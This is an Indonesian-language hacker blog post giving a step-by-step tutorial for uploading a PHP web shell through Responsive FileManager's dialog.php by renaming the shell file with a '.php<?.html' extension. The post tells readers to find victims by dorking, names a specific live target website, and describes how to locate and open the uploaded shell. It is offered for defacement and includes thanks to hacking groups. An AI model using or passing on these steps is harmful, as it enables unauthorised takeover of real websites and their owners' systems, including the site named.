=====================================
Halo ker, gw ClownTerror072. Oke kali ini gw mau ngasi tau temuan celah terbaru di plugin rfm / Responsive FileManager.
Buat kalian yg dulu deface rfm cuma bisa upload script html doang, skrng ada cara upload shell php nya wkwk. Oke langsung aja ke tutorialnya...
=====================================
( kembangin sendiri, jan manja ker )
=====================================
EXPLOIT :
- /filemanager/dialog.php
- ubah ekstensi shell dari namashell.php ke namashell.php<?.html
=====================================
LANGKAH - LANGKAH :
- Dorking dulu dan pilih salah satu target.
- Live Target : https://www.gem.clinic/template/admin/filemanager/
- Buka /filemanager/dialog.php.
- Upload shell yang sudah kalian rename ( namashell.php<?.html )
- Klik kanan salah satu file, dan pilih Show URL untuk melihat lokasi ke uploadnya, nah kebetulan target saya lokasi ke uploadnya di /assets/user-img/
- Akses shellnya di "/assets/user/img/namashell.php"
- Extensi file .php<?.html akan otomatis ke rename menjadi .php, jadi kalian langsung buka namashell.php aja.
Oke sekian dari saya.
Sumber : https://www.xploit-blog.site/2020/02/responsive-filemanager-rfm-inject.html
Sumber : https://www.xploit-blog.site/2020/02/responsive-filemanager-rfm-inject.html
thx to : Jogjakarta Hacker Link, FlithyRoot, ClownTerror072
0 Comments